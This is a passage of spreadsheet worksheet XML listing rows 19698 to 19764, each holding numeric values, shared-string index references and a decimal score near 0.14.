    <row r="19698" ht="15.75" customHeight="1">
      <c r="A19698" s="1">
        <v>12582.0</v>
      </c>
      <c r="B19698" s="2">
        <v>3.0018312E7</v>
      </c>
      <c r="C19698" s="2" t="s">
        <v>18985</v>
      </c>
      <c r="D19698" s="2">
        <v>1.0</v>
      </c>
      <c r="E19698" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19698" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="19699" ht="15.75" customHeight="1">
      <c r="A19699" s="1">
        <v>14455.0</v>
      </c>
      <c r="B19699" s="2">
        <v>3.9428595E7</v>
      </c>
      <c r="C19699" s="2" t="s">
        <v>18986</v>
      </c>
      <c r="D19699" s="2">
        <v>1.0</v>
      </c>
      <c r="E19699" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19699" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="19700" ht="15.75" customHeight="1">
      <c r="A19700" s="1">
        <v>7942.0</v>
      </c>
      <c r="B19700" s="2">
        <v>5.2619803E7</v>
      </c>
      <c r="C19700" s="2" t="s">
        <v>18987</v>
      </c>
      <c r="D19700" s="2">
        <v>1.0</v>
      </c>
      <c r="E19700" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19700" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="19701" ht="15.75" customHeight="1">
      <c r="A19701" s="1">
        <v>12686.0</v>
      </c>
      <c r="B19701" s="2">
        <v>3.0688405E7</v>
      </c>
      <c r="C19701" s="2" t="s">
        <v>18988</v>
      </c>
      <c r="D19701" s="2">
        <v>1.0</v>
      </c>
      <c r="E19701" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19701" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="19702" ht="15.75" customHeight="1">
      <c r="A19702" s="1">
        <v>8715.0</v>
      </c>
      <c r="B19702" s="2">
        <v>5.4461113E7</v>
      </c>
      <c r="C19702" s="2" t="s">
        <v>18989</v>
      </c>
      <c r="D19702" s="2">
        <v>1.0</v>
      </c>
      <c r="E19702" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19702" s="2">
        <v>0.1429872495446266</v>
      </c>
    </row>
    <row r="19703" ht="15.75" customHeight="1">
      <c r="A19703" s="1">
        <v>5919.0</v>
      </c>
      <c r="B19703" s="2">
        <v>4.7214698E7</v>
      </c>
      <c r="C19703" s="2" t="s">
        <v>18990</v>
      </c>
      <c r="D19703" s="2">
        <v>1.0</v>
      </c>
      <c r="E19703" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19703" s="2">
        <v>0.1429738562091504</v>
      </c>
    </row>
    <row r="19704" ht="15.75" customHeight="1">
      <c r="A19704" s="1">
        <v>5596.0</v>
      </c>
      <c r="B19704" s="2">
        <v>4.6128146E7</v>
      </c>
      <c r="C19704" s="2" t="s">
        <v>18991</v>
      </c>
      <c r="D19704" s="2">
        <v>1.0</v>
      </c>
      <c r="E19704" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19704" s="2">
        <v>0.14272030651341</v>
      </c>
    </row>
    <row r="19705" ht="15.75" customHeight="1">
      <c r="A19705" s="1">
        <v>2836.0</v>
      </c>
      <c r="B19705" s="2">
        <v>3.5424478E7</v>
      </c>
      <c r="C19705" s="2" t="s">
        <v>18992</v>
      </c>
      <c r="D19705" s="2">
        <v>1.0</v>
      </c>
      <c r="E19705" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19705" s="2">
        <v>0.142512077294686</v>
      </c>
    </row>
    <row r="19706" ht="15.75" customHeight="1">
      <c r="A19706" s="1">
        <v>17794.0</v>
      </c>
      <c r="B19706" s="2">
        <v>5.0801358E7</v>
      </c>
      <c r="C19706" s="2" t="s">
        <v>18993</v>
      </c>
      <c r="D19706" s="2">
        <v>1.0</v>
      </c>
      <c r="E19706" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19706" s="2">
        <v>0.142512077294686</v>
      </c>
    </row>
    <row r="19707" ht="15.75" customHeight="1">
      <c r="A19707" s="1">
        <v>19901.0</v>
      </c>
      <c r="B19707" s="2">
        <v>5.7337617E7</v>
      </c>
      <c r="C19707" s="2" t="s">
        <v>18994</v>
      </c>
      <c r="D19707" s="2">
        <v>1.0</v>
      </c>
      <c r="E19707" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19707" s="2">
        <v>0.1424731182795699</v>
      </c>
    </row>
    <row r="19708" ht="15.75" customHeight="1">
      <c r="A19708" s="1">
        <v>17529.0</v>
      </c>
      <c r="B19708" s="2">
        <v>5.0104681E7</v>
      </c>
      <c r="C19708" s="2" t="s">
        <v>18995</v>
      </c>
      <c r="D19708" s="2">
        <v>1.0</v>
      </c>
      <c r="E19708" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19708" s="2">
        <v>0.1424242424242425</v>
      </c>
    </row>
    <row r="19709" ht="15.75" customHeight="1">
      <c r="A19709" s="1">
        <v>6338.0</v>
      </c>
      <c r="B19709" s="2">
        <v>4.8296413E7</v>
      </c>
      <c r="C19709" s="2" t="s">
        <v>18996</v>
      </c>
      <c r="D19709" s="2">
        <v>1.0</v>
      </c>
      <c r="E19709" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19709" s="2">
        <v>0.1424242424242424</v>
      </c>
    </row>
    <row r="19710" ht="15.75" customHeight="1">
      <c r="A19710" s="1">
        <v>2378.0</v>
      </c>
      <c r="B19710" s="2">
        <v>3.331894E7</v>
      </c>
      <c r="C19710" s="2" t="s">
        <v>18997</v>
      </c>
      <c r="D19710" s="2">
        <v>1.0</v>
      </c>
      <c r="E19710" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19710" s="2">
        <v>0.1422558922558923</v>
      </c>
    </row>
    <row r="19711" ht="15.75" customHeight="1">
      <c r="A19711" s="1">
        <v>1068.0</v>
      </c>
      <c r="B19711" s="2">
        <v>2.3531124E7</v>
      </c>
      <c r="C19711" s="2" t="s">
        <v>18998</v>
      </c>
      <c r="D19711" s="2">
        <v>1.0</v>
      </c>
      <c r="E19711" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19711" s="2">
        <v>0.1418650793650794</v>
      </c>
    </row>
    <row r="19712" ht="15.75" customHeight="1">
      <c r="A19712" s="1">
        <v>15761.0</v>
      </c>
      <c r="B19712" s="2">
        <v>4.416801E7</v>
      </c>
      <c r="C19712" s="2" t="s">
        <v>18999</v>
      </c>
      <c r="D19712" s="2">
        <v>1.0</v>
      </c>
      <c r="E19712" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19712" s="2">
        <v>0.1418650793650794</v>
      </c>
    </row>
    <row r="19713" ht="15.75" customHeight="1">
      <c r="A19713" s="1">
        <v>7251.0</v>
      </c>
      <c r="B19713" s="2">
        <v>5.0705605E7</v>
      </c>
      <c r="C19713" s="2" t="s">
        <v>19000</v>
      </c>
      <c r="D19713" s="2">
        <v>1.0</v>
      </c>
      <c r="E19713" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19713" s="2">
        <v>0.1417910447761195</v>
      </c>
    </row>
    <row r="19714" ht="15.75" customHeight="1">
      <c r="A19714" s="1">
        <v>9597.0</v>
      </c>
      <c r="B19714" s="2">
        <v>5.6132088E7</v>
      </c>
      <c r="C19714" s="2" t="s">
        <v>19001</v>
      </c>
      <c r="D19714" s="2">
        <v>1.0</v>
      </c>
      <c r="E19714" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19714" s="2">
        <v>0.1417910447761194</v>
      </c>
    </row>
    <row r="19715" ht="15.75" customHeight="1">
      <c r="A19715" s="1">
        <v>18477.0</v>
      </c>
      <c r="B19715" s="2">
        <v>5.2868165E7</v>
      </c>
      <c r="C19715" s="2" t="s">
        <v>19002</v>
      </c>
      <c r="D19715" s="2">
        <v>1.0</v>
      </c>
      <c r="E19715" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19715" s="2">
        <v>0.1417378917378918</v>
      </c>
    </row>
    <row r="19716" ht="15.75" customHeight="1">
      <c r="A19716" s="1">
        <v>4762.0</v>
      </c>
      <c r="B19716" s="2">
        <v>4.3413151E7</v>
      </c>
      <c r="C19716" s="2" t="s">
        <v>19003</v>
      </c>
      <c r="D19716" s="2">
        <v>1.0</v>
      </c>
      <c r="E19716" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19716" s="2">
        <v>0.1416666666666667</v>
      </c>
    </row>
    <row r="19717" ht="15.75" customHeight="1">
      <c r="A19717" s="1">
        <v>19650.0</v>
      </c>
      <c r="B19717" s="2">
        <v>5.6328303E7</v>
      </c>
      <c r="C19717" s="2" t="s">
        <v>19004</v>
      </c>
      <c r="D19717" s="2">
        <v>1.0</v>
      </c>
      <c r="E19717" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19717" s="2">
        <v>0.1416275430359938</v>
      </c>
    </row>
    <row r="19718" ht="15.75" customHeight="1">
      <c r="A19718" s="1">
        <v>12586.0</v>
      </c>
      <c r="B19718" s="2">
        <v>3.0033345E7</v>
      </c>
      <c r="C19718" s="2" t="s">
        <v>19005</v>
      </c>
      <c r="D19718" s="2">
        <v>1.0</v>
      </c>
      <c r="E19718" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19718" s="2">
        <v>0.1414930555555556</v>
      </c>
    </row>
    <row r="19719" ht="15.75" customHeight="1">
      <c r="A19719" s="1">
        <v>4070.0</v>
      </c>
      <c r="B19719" s="2">
        <v>4.1166132E7</v>
      </c>
      <c r="C19719" s="2" t="s">
        <v>19006</v>
      </c>
      <c r="D19719" s="2">
        <v>1.0</v>
      </c>
      <c r="E19719" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19719" s="2">
        <v>0.1413398692810458</v>
      </c>
    </row>
    <row r="19720" ht="15.75" customHeight="1">
      <c r="A19720" s="1">
        <v>3622.0</v>
      </c>
      <c r="B19720" s="2">
        <v>3.9192703E7</v>
      </c>
      <c r="C19720" s="2" t="s">
        <v>19007</v>
      </c>
      <c r="D19720" s="2">
        <v>1.0</v>
      </c>
      <c r="E19720" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19720" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="19721" ht="15.75" customHeight="1">
      <c r="A19721" s="1">
        <v>11302.0</v>
      </c>
      <c r="B19721" s="2">
        <v>2.0974942E7</v>
      </c>
      <c r="C19721" s="2" t="s">
        <v>19008</v>
      </c>
      <c r="D19721" s="2">
        <v>1.0</v>
      </c>
      <c r="E19721" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19721" s="2">
        <v>0.1410818713450293</v>
      </c>
    </row>
    <row r="19722" ht="15.75" customHeight="1">
      <c r="A19722" s="1">
        <v>469.0</v>
      </c>
      <c r="B19722" s="2">
        <v>1.735765E7</v>
      </c>
      <c r="C19722" s="2" t="s">
        <v>19009</v>
      </c>
      <c r="D19722" s="2">
        <v>1.0</v>
      </c>
      <c r="E19722" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19722" s="2">
        <v>0.1410256410256411</v>
      </c>
    </row>
    <row r="19723" ht="15.75" customHeight="1">
      <c r="A19723" s="1">
        <v>9061.0</v>
      </c>
      <c r="B19723" s="2">
        <v>5.5106153E7</v>
      </c>
      <c r="C19723" s="2" t="s">
        <v>19010</v>
      </c>
      <c r="D19723" s="2">
        <v>1.0</v>
      </c>
      <c r="E19723" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19723" s="2">
        <v>0.1410256410256411</v>
      </c>
    </row>
    <row r="19724" ht="15.75" customHeight="1">
      <c r="A19724" s="1">
        <v>29221.0</v>
      </c>
      <c r="B19724" s="2">
        <v>3.0823155E7</v>
      </c>
      <c r="C19724" s="2" t="s">
        <v>19011</v>
      </c>
      <c r="D19724" s="2">
        <v>1.0</v>
      </c>
      <c r="E19724" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19724" s="2">
        <v>0.1410256410256411</v>
      </c>
    </row>
    <row r="19725" ht="15.75" customHeight="1">
      <c r="A19725" s="1">
        <v>1875.0</v>
      </c>
      <c r="B19725" s="2">
        <v>2.9663754E7</v>
      </c>
      <c r="C19725" s="2" t="s">
        <v>19012</v>
      </c>
      <c r="D19725" s="2">
        <v>1.0</v>
      </c>
      <c r="E19725" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19725" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="19726" ht="15.75" customHeight="1">
      <c r="A19726" s="1">
        <v>2146.0</v>
      </c>
      <c r="B19726" s="2">
        <v>3.1626044E7</v>
      </c>
      <c r="C19726" s="2" t="s">
        <v>19013</v>
      </c>
      <c r="D19726" s="2">
        <v>1.0</v>
      </c>
      <c r="E19726" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19726" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="19727" ht="15.75" customHeight="1">
      <c r="A19727" s="1">
        <v>4053.0</v>
      </c>
      <c r="B19727" s="2">
        <v>4.1106331E7</v>
      </c>
      <c r="C19727" s="2" t="s">
        <v>19014</v>
      </c>
      <c r="D19727" s="2">
        <v>1.0</v>
      </c>
      <c r="E19727" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19727" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="19728" ht="15.75" customHeight="1">
      <c r="A19728" s="1">
        <v>12723.0</v>
      </c>
      <c r="B19728" s="2">
        <v>3.0896703E7</v>
      </c>
      <c r="C19728" s="2" t="s">
        <v>19015</v>
      </c>
      <c r="D19728" s="2">
        <v>1.0</v>
      </c>
      <c r="E19728" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19728" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="19729" ht="15.75" customHeight="1">
      <c r="A19729" s="1">
        <v>14377.0</v>
      </c>
      <c r="B19729" s="2">
        <v>3.8994109E7</v>
      </c>
      <c r="C19729" s="2" t="s">
        <v>19016</v>
      </c>
      <c r="D19729" s="2">
        <v>1.0</v>
      </c>
      <c r="E19729" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19729" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="19730" ht="15.75" customHeight="1">
      <c r="A19730" s="1">
        <v>22156.0</v>
      </c>
      <c r="B19730" s="2">
        <v>3.1315471E7</v>
      </c>
      <c r="C19730" s="2" t="s">
        <v>19017</v>
      </c>
      <c r="D19730" s="2">
        <v>1.0</v>
      </c>
      <c r="E19730" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19730" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="19731" ht="15.75" customHeight="1">
      <c r="A19731" s="1">
        <v>29328.0</v>
      </c>
      <c r="B19731" s="2">
        <v>3.131547E7</v>
      </c>
      <c r="C19731" s="2" t="s">
        <v>19018</v>
      </c>
      <c r="D19731" s="2">
        <v>1.0</v>
      </c>
      <c r="E19731" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19731" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="19732" ht="15.75" customHeight="1">
      <c r="A19732" s="1">
        <v>32028.0</v>
      </c>
      <c r="B19732" s="2">
        <v>5.360831E7</v>
      </c>
      <c r="C19732" s="2" t="s">
        <v>19019</v>
      </c>
      <c r="D19732" s="2">
        <v>1.0</v>
      </c>
      <c r="E19732" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19732" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="19733" ht="15.75" customHeight="1">
      <c r="A19733" s="1">
        <v>33079.0</v>
      </c>
      <c r="B19733" s="2">
        <v>6909820.0</v>
      </c>
      <c r="C19733" s="2" t="s">
        <v>19020</v>
      </c>
      <c r="D19733" s="2">
        <v>1.0</v>
      </c>
      <c r="E19733" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19733" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="19734" ht="15.75" customHeight="1">
      <c r="A19734" s="1">
        <v>9709.0</v>
      </c>
      <c r="B19734" s="2">
        <v>5.6384894E7</v>
      </c>
      <c r="C19734" s="2" t="s">
        <v>19021</v>
      </c>
      <c r="D19734" s="2">
        <v>1.0</v>
      </c>
      <c r="E19734" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19734" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="19735" ht="15.75" customHeight="1">
      <c r="A19735" s="1">
        <v>7231.0</v>
      </c>
      <c r="B19735" s="2">
        <v>5.0665568E7</v>
      </c>
      <c r="C19735" s="2" t="s">
        <v>19022</v>
      </c>
      <c r="D19735" s="2">
        <v>1.0</v>
      </c>
      <c r="E19735" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19735" s="2">
        <v>0.1405723905723906</v>
      </c>
    </row>
    <row r="19736" ht="15.75" customHeight="1">
      <c r="A19736" s="1">
        <v>21010.0</v>
      </c>
      <c r="B19736" s="2">
        <v>1.7271832E7</v>
      </c>
      <c r="C19736" s="2" t="s">
        <v>19023</v>
      </c>
      <c r="D19736" s="2">
        <v>1.0</v>
      </c>
      <c r="E19736" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19736" s="2">
        <v>0.1404040404040404</v>
      </c>
    </row>
    <row r="19737" ht="15.75" customHeight="1">
      <c r="A19737" s="1">
        <v>4050.0</v>
      </c>
      <c r="B19737" s="2">
        <v>4.1078652E7</v>
      </c>
      <c r="C19737" s="2" t="s">
        <v>19024</v>
      </c>
      <c r="D19737" s="2">
        <v>1.0</v>
      </c>
      <c r="E19737" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19737" s="2">
        <v>0.1398809523809524</v>
      </c>
    </row>
    <row r="19738" ht="15.75" customHeight="1">
      <c r="A19738" s="1">
        <v>31926.0</v>
      </c>
      <c r="B19738" s="2">
        <v>5304814.0</v>
      </c>
      <c r="C19738" s="2" t="s">
        <v>19025</v>
      </c>
      <c r="D19738" s="2">
        <v>1.0</v>
      </c>
      <c r="E19738" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19738" s="2">
        <v>0.1398809523809524</v>
      </c>
    </row>
    <row r="19739" ht="15.75" customHeight="1">
      <c r="A19739" s="1">
        <v>2396.0</v>
      </c>
      <c r="B19739" s="2">
        <v>3338285.0</v>
      </c>
      <c r="C19739" s="2" t="s">
        <v>19026</v>
      </c>
      <c r="D19739" s="2">
        <v>1.0</v>
      </c>
      <c r="E19739" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19739" s="2">
        <v>0.1398148148148148</v>
      </c>
    </row>
    <row r="19740" ht="15.75" customHeight="1">
      <c r="A19740" s="1">
        <v>5702.0</v>
      </c>
      <c r="B19740" s="2">
        <v>4.6531679E7</v>
      </c>
      <c r="C19740" s="2" t="s">
        <v>19027</v>
      </c>
      <c r="D19740" s="2">
        <v>1.0</v>
      </c>
      <c r="E19740" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19740" s="2">
        <v>0.1398148148148148</v>
      </c>
    </row>
    <row r="19741" ht="15.75" customHeight="1">
      <c r="A19741" s="1">
        <v>17668.0</v>
      </c>
      <c r="B19741" s="2">
        <v>5.0469626E7</v>
      </c>
      <c r="C19741" s="2" t="s">
        <v>19028</v>
      </c>
      <c r="D19741" s="2">
        <v>1.0</v>
      </c>
      <c r="E19741" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19741" s="2">
        <v>0.1393762183235868</v>
      </c>
    </row>
    <row r="19742" ht="15.75" customHeight="1">
      <c r="A19742" s="1">
        <v>587.0</v>
      </c>
      <c r="B19742" s="2">
        <v>1.9149441E7</v>
      </c>
      <c r="C19742" s="2" t="s">
        <v>19029</v>
      </c>
      <c r="D19742" s="2">
        <v>1.0</v>
      </c>
      <c r="E19742" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19742" s="2">
        <v>0.139344262295082</v>
      </c>
    </row>
    <row r="19743" ht="15.75" customHeight="1">
      <c r="A19743" s="1">
        <v>1303.0</v>
      </c>
      <c r="B19743" s="2">
        <v>2.5695633E7</v>
      </c>
      <c r="C19743" s="2" t="s">
        <v>19030</v>
      </c>
      <c r="D19743" s="2">
        <v>1.0</v>
      </c>
      <c r="E19743" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19743" s="2">
        <v>0.1393162393162393</v>
      </c>
    </row>
    <row r="19744" ht="15.75" customHeight="1">
      <c r="A19744" s="1">
        <v>15149.0</v>
      </c>
      <c r="B19744" s="2">
        <v>4.1955229E7</v>
      </c>
      <c r="C19744" s="2" t="s">
        <v>19031</v>
      </c>
      <c r="D19744" s="2">
        <v>1.0</v>
      </c>
      <c r="E19744" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19744" s="2">
        <v>0.1392694063926941</v>
      </c>
    </row>
    <row r="19745" ht="15.75" customHeight="1">
      <c r="A19745" s="1">
        <v>3336.0</v>
      </c>
      <c r="B19745" s="2">
        <v>3.7708925E7</v>
      </c>
      <c r="C19745" s="2" t="s">
        <v>19032</v>
      </c>
      <c r="D19745" s="2">
        <v>1.0</v>
      </c>
      <c r="E19745" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19745" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="19746" ht="15.75" customHeight="1">
      <c r="A19746" s="1">
        <v>4366.0</v>
      </c>
      <c r="B19746" s="2">
        <v>4.2122553E7</v>
      </c>
      <c r="C19746" s="2" t="s">
        <v>19033</v>
      </c>
      <c r="D19746" s="2">
        <v>1.0</v>
      </c>
      <c r="E19746" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19746" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="19747" ht="15.75" customHeight="1">
      <c r="A19747" s="1">
        <v>4426.0</v>
      </c>
      <c r="B19747" s="2">
        <v>4.2318104E7</v>
      </c>
      <c r="C19747" s="2" t="s">
        <v>19034</v>
      </c>
      <c r="D19747" s="2">
        <v>1.0</v>
      </c>
      <c r="E19747" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19747" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="19748" ht="15.75" customHeight="1">
      <c r="A19748" s="1">
        <v>1723.0</v>
      </c>
      <c r="B19748" s="2">
        <v>2.8709141E7</v>
      </c>
      <c r="C19748" s="2" t="s">
        <v>19035</v>
      </c>
      <c r="D19748" s="2">
        <v>1.0</v>
      </c>
      <c r="E19748" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19748" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="19749" ht="15.75" customHeight="1">
      <c r="A19749" s="1">
        <v>15960.0</v>
      </c>
      <c r="B19749" s="2">
        <v>4.4770842E7</v>
      </c>
      <c r="C19749" s="2" t="s">
        <v>19036</v>
      </c>
      <c r="D19749" s="2">
        <v>1.0</v>
      </c>
      <c r="E19749" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19749" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="19750" ht="15.75" customHeight="1">
      <c r="A19750" s="1">
        <v>17170.0</v>
      </c>
      <c r="B19750" s="2">
        <v>4.8890225E7</v>
      </c>
      <c r="C19750" s="2" t="s">
        <v>19037</v>
      </c>
      <c r="D19750" s="2">
        <v>1.0</v>
      </c>
      <c r="E19750" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19750" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="19751" ht="15.75" customHeight="1">
      <c r="A19751" s="1">
        <v>4243.0</v>
      </c>
      <c r="B19751" s="2">
        <v>4.1789363E7</v>
      </c>
      <c r="C19751" s="2" t="s">
        <v>19038</v>
      </c>
      <c r="D19751" s="2">
        <v>1.0</v>
      </c>
      <c r="E19751" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19751" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="19752" ht="15.75" customHeight="1">
      <c r="A19752" s="1">
        <v>6151.0</v>
      </c>
      <c r="B19752" s="2">
        <v>4.7856895E7</v>
      </c>
      <c r="C19752" s="2" t="s">
        <v>19039</v>
      </c>
      <c r="D19752" s="2">
        <v>1.0</v>
      </c>
      <c r="E19752" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19752" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="19753" ht="15.75" customHeight="1">
      <c r="A19753" s="1">
        <v>6152.0</v>
      </c>
      <c r="B19753" s="2">
        <v>4.7856895E7</v>
      </c>
      <c r="C19753" s="2" t="s">
        <v>19040</v>
      </c>
      <c r="D19753" s="2">
        <v>1.0</v>
      </c>
      <c r="E19753" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19753" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="19754" ht="15.75" customHeight="1">
      <c r="A19754" s="1">
        <v>6555.0</v>
      </c>
      <c r="B19754" s="2">
        <v>4.8878972E7</v>
      </c>
      <c r="C19754" s="2" t="s">
        <v>19041</v>
      </c>
      <c r="D19754" s="2">
        <v>1.0</v>
      </c>
      <c r="E19754" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19754" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="19755" ht="15.75" customHeight="1">
      <c r="A19755" s="1">
        <v>9601.0</v>
      </c>
      <c r="B19755" s="2">
        <v>5.6146331E7</v>
      </c>
      <c r="C19755" s="2" t="s">
        <v>19042</v>
      </c>
      <c r="D19755" s="2">
        <v>1.0</v>
      </c>
      <c r="E19755" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19755" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="19756" ht="15.75" customHeight="1">
      <c r="A19756" s="1">
        <v>12171.0</v>
      </c>
      <c r="B19756" s="2">
        <v>2.7437487E7</v>
      </c>
      <c r="C19756" s="2" t="s">
        <v>19043</v>
      </c>
      <c r="D19756" s="2">
        <v>1.0</v>
      </c>
      <c r="E19756" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19756" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="19757" ht="15.75" customHeight="1">
      <c r="A19757" s="1">
        <v>14153.0</v>
      </c>
      <c r="B19757" s="2">
        <v>3.7998358E7</v>
      </c>
      <c r="C19757" s="2" t="s">
        <v>19044</v>
      </c>
      <c r="D19757" s="2">
        <v>1.0</v>
      </c>
      <c r="E19757" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19757" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="19758" ht="15.75" customHeight="1">
      <c r="A19758" s="1">
        <v>24958.0</v>
      </c>
      <c r="B19758" s="2">
        <v>1.2598405E7</v>
      </c>
      <c r="C19758" s="2" t="s">
        <v>19045</v>
      </c>
      <c r="D19758" s="2">
        <v>1.0</v>
      </c>
      <c r="E19758" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19758" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="19759" ht="15.75" customHeight="1">
      <c r="A19759" s="1">
        <v>26021.0</v>
      </c>
      <c r="B19759" s="2">
        <v>1.5373804E7</v>
      </c>
      <c r="C19759" s="2" t="s">
        <v>19046</v>
      </c>
      <c r="D19759" s="2">
        <v>1.0</v>
      </c>
      <c r="E19759" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19759" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="19760" ht="15.75" customHeight="1">
      <c r="A19760" s="1">
        <v>2113.0</v>
      </c>
      <c r="B19760" s="2">
        <v>3.1365254E7</v>
      </c>
      <c r="C19760" s="2" t="s">
        <v>19047</v>
      </c>
      <c r="D19760" s="2">
        <v>1.0</v>
      </c>
      <c r="E19760" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19760" s="2">
        <v>0.1380208333333334</v>
      </c>
    </row>
    <row r="19761" ht="15.75" customHeight="1">
      <c r="A19761" s="1">
        <v>24914.0</v>
      </c>
      <c r="B19761" s="2">
        <v>1.234845E7</v>
      </c>
      <c r="C19761" s="2" t="s">
        <v>19048</v>
      </c>
      <c r="D19761" s="2">
        <v>1.0</v>
      </c>
      <c r="E19761" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19761" s="2">
        <v>0.1380208333333334</v>
      </c>
    </row>
    <row r="19762" ht="15.75" customHeight="1">
      <c r="A19762" s="1">
        <v>3018.0</v>
      </c>
      <c r="B19762" s="2">
        <v>3.6406067E7</v>
      </c>
      <c r="C19762" s="2" t="s">
        <v>19049</v>
      </c>
      <c r="D19762" s="2">
        <v>1.0</v>
      </c>
      <c r="E19762" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19762" s="2">
        <v>0.1374269005847954</v>
      </c>
    </row>
    <row r="19763" ht="15.75" customHeight="1">
      <c r="A19763" s="1">
        <v>8816.0</v>
      </c>
      <c r="B19763" s="2">
        <v>5.4633035E7</v>
      </c>
      <c r="C19763" s="2" t="s">
        <v>19050</v>
      </c>
      <c r="D19763" s="2">
        <v>1.0</v>
      </c>
      <c r="E19763" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19763" s="2">
        <v>0.1374269005847954</v>
      </c>
    </row>
    <row r="19764" ht="15.75" customHeight="1">
      <c r="A19764" s="1">
        <v>18202.0</v>
      </c>
      <c r="B19764" s="2">
        <v>5.2049938E7</v>
      </c>
      <c r="C19764" s="2" t="s">
        <v>19051</v>
      </c>
      <c r="D19764" s="2">
        <v>1.0</v>
      </c>
      <c r="E19764" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F19764" s="2">
        <v>0.1374269005847954</v>
      </c>
    </row>
